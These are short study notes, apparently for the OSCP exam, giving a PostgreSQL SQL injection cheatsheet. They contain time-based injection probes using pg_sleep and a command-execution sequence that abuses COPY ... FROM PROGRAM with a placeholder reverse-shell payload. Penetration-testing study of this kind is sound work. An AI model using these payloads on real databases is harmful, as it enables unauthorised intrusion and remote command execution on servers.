// notes/ Web Exploitation
🕸️

SQL Injection Postgres Cheatsheet

Notes from oscp.adot8.com — web applications.

#web applications#adot8
source · oscp.adot8.com · web-applications/sql-injection_postgres-cheatsheet

Postgres Cheatsheet

code
01'select pg_sleep(3)
02;select pg_sleep(3)

{% embed url="https://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet" %}

RCE

code
01DROP TABLE IF EXISTS cmd_exec
02CREATE TABLE cmd_exec(cmd_output text)
03COPY cmd_exec FROM PROGRAM '<rev shell payload>'
04SELECT * from cmd_exec